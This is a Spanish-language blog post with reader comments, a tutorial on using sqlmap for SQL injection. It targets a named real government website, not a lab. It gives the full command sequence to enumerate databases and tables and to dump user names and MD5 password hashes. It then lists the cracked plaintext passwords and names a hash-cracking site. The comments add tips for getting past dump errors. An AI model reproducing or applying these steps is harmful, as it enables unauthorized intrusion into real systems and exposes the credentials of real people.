lunes, 20 de enero de 2014

Posted on  

Aprender Sqlmap desde 0




¿ Que es una inyección de Sql ?

Es un error de sintaxis  de la base de datos, la cual se puede ver reflejada de una página web, mediante sentencias  la cual nos permite  penetrarla mediante una inyección de SQL, la cual es muy provechada para tener acceso a toda la base de datos de la web afectada,con dicho ataque
Este error lo podemos encontrar mediante las conocidas Dork de Google que son las más usadas para hallar este tipo de errores o utilizando un Scanner de vulnerabilidades web la cual es un método profesional de buscar diferentes tipos de bug.
Las herramientas más conocida para penetrar las base de datos de una web son:
  1. SQLMAP
  2. Havij




sqlmap es una herramienta de pruebas de penetración de código abierto, que automatiza el proceso de detectar y explotar los errores de inyección SQL y hacerse cargo de los servidores de bases de datos. Viene con un potente motor de detección, muchas características de nicho para el último probador de penetración y una amplia gama de interruptores de duración de las huellas dactilares de base de datos, más de ir a buscar los datos de la base de datos, para acceder al sistema de archivos subyacente y ejecutar comandos en el sistema operativo a través de fuera conexiones de banda.




Ejemplo de Sqlmap :)

Primero buscamos una web " Vulnerable por Ejemplo "

http://www.fonep.gob.ve/noticias.php Como veran dicha web se ve normal a simple vista pero no es asi, Pues hay un parametro inyectable " Noticias.php?id=195 "

http://www.fonep.gob.ve/noticias.php?id=195



Como nos Damos cuenta que tiene una vulneravilidad esta web ??? , pues es sensillo las vulneravilidades son Bug que son Errores de Fuente que pueden ser Vulnerables a una penetracion

http://www.fonep.gob.ve/noticias.php?id=195 >> ' << le agregaremos esta comilla , Asi Ejemplo

http://www.fonep.gob.ve/noticias.php?id='195

Miren Como la web nos vota todos los Errores del SQL


Ahora Sabemos que la Web Esta 100 % Vulnerable Ahora La Inyectaremos Mediante " SqlMap "

1 - Abrimos SqlMap saldra sus Toolz , en la terminal podemos lo siente

‎./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 --dbs



Como Vieron nos voto 2 DataBase , La opcional es Information_schema " lo que nos interesa es Esta " penof_cms " Ahora Pondremos Esto

./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 --dbs -D penof_cms --tables



Como ven Nos Voto 20 Tablas " las Cual lo que nos interesa es el usuario " justamente en esa web Esta a Simple Vista " fonep_usuarios " Ahora Pondremos Esto

./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 -D penof_cms -T fonep_usuarios --columns


Como veran nos voto 9 Columnas Entraremos a " id_usuarios " pondremos esto

./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 -D penof_cms -T fonep_usuarios -C nombre_usuarios --dump



Los Usuarios Son :

Ernesto

Luis Sergio

Ahora sacaremos la password de esas ID pondremos Esto

./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 -D penof_cms -T fonep_usuarios -C clave_usuarios --dump



Como Veran Nos Vota 3 Claves , " Pero Estan Encryptadas ^^ " Para Ello Nesitamos Desencryptarlas Como esta en Extension MD5 Podemos Desencryptarlas En Esta Web :

http://www.md5decrypter.co.uk/

Las Claves Son :

3sert

54321abub

resres

Gracias Por Ver Este Post. :)

8 comentarios:

  1. Anónimo24 de agosto de 2013, 14:52

    a mi siempre me da error en todas las paginas en el utlimo paso , cuando me tiene que mostrar la contraseña, el msn o el nombre siempre me da error ayudaaaaaaaaaaa

    ResponderEliminar
    Respuestas
    1. Omar Rodriguez17 de septiembre de 2013, 9:33

      --no-cast añade este script cuando no te vote y te salga los errores que te impiden extraer en el DUMP , Saludos

      Eliminar
  2. Crist Uchiha10 de diciembre de 2013, 13:08

    Hola amigo una pregunta sabes como desencryptar type Varchar?!

    ResponderEliminar
  3. camilo garcia1 de octubre de 2015, 16:07

    hola omar
    lo que pasa es que tengo un problema con sqlmap recientemente lo instale en windows 8.1 junto con pyton el problema lo tengo al ejecutar este programa al abrir el cmd e introducir el comando inicial para inyectar con sql ejemplo: sqlmap.py -u www.tupagina --dbs me da un error en un bloc de notas con una cantidad de codigos que no entiendo.
    enlace: file:///G:/error%20sqlmap.py

    ResponderEliminar
    Respuestas
    1. Omar Rodriguez21 de octubre de 2015, 6:44

      si has instalado python debe correr perfectamente el sqlmap por la terminal, en todo caso dirigite a a la carpeta de la herramienta y el archivo "ponlo en modo de ejecucion en python ( anti-clip abrir con python)"

      Eliminar
  4. Unknown15 de abril de 2016, 15:19

    Hola Omar que tal soy nuevo en esto, y tengo una duda, emm el sqlmap solo se aplica a las paginas que solo tengan parametro? como el que pone en ejemplo "http://www.fonep.gob.ve/noticias.php?id=195", solo si sale ese id o se puede con cualquier pagina, asi no sea como la del ejemplo?.. gracias de antemano, saludos

    ResponderEliminar
    Respuestas
    1. Omar Rodriguez21 de mayo de 2016, 22:22

      Se puede ejecutar en diferentes parámetros, no obstante existe variedades de Inyecciones SQL, Metodo POST, metodo GET, Metodo capcha, etc, todos ellos puedes buscarlos en mi BLOG, como también buscar referencias en los navegadores, Saludos.

      Eliminar
    2. Blog Tecnologico25 de octubre de 2016, 11:46

      OMAR PODRIAS ENVIARME TU CORREO A ESTA DIRECCION: sean_serioss_@hotmail.com

      para hacerte una consulta por favor te lo agradeceria

      Eliminar

Suscribirse a: Enviar comentarios (Atom)

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares